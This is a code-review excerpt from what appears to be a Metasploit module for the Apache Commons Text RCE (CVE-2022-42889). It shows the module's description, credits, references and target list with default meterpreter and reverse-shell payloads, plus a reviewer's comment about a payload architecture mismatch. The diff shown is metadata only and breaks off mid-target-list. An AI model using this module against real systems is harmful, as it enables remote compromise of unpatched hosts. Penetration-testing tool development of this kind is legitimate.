modules/exploits/multi/http/apache_commons_text4shell.rb

```diff
@@ -0,0 +1,200 @@
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Commons Text RCE',
+        'Description' => %q{
+          This exploit takes advantage of the StringSubstitutor interpolator class,
+          which is included in the Commons Text library. A default interpolator
+          allows for string lookups that can lead to Remote Code Execution. This
+          is due to a logic flaw that makes the “script”, “dns” and “url” lookup
+          keys interpolated by default, as opposed to what it should be, according
+          to the documentation of the StringLookupFactory class. Those keys allow
+          an attacker to execute arbitrary code via lookups primarily using the
+          "script" key.
+
+          In order to exploit the vulnerabilities, the following requirements must
+          be met:
+
+          Run a version of Apache Commons Text from version 1.5 to 1.9
+          Use the StringSubstitutor interpolator
+          Target should run JDK < 15
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Alvaro Muñoz', # Original research
+          'Karthik UJ', # PoC
+          'Gaurav Jain', # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2022-42889'],
+          ['URL', 'https://sysdig.com/blog/cve-2022-42889-text4shell/'],
+          ['URL', 'https://github.com/karthikuj/cve-2022-42889-text4shell-docker']
+        ],
+        'Platform' => ['win', 'linux', 'unix', 'java'],
+        'Targets' => [
+          [
+            'Java (in-memory)',
+            {
+              'Type' => :java,
+              'Platform' => 'java',
+              'Arch' => ARCH_JAVA,
+              'DefaultOptions' => { 'Payload' => 'java/meterpreter/reverse_tcp' }
+            },
+          ],
+          [
+            'Windows EXE Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_dropper,
+              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_command,
+              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_jjs' }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
```

Comment:
Is there a reason you selected this payload?  It will fail on 32-bit hosts that are supported by this target entry.

Reply:
Yes you're right, payload should've been x86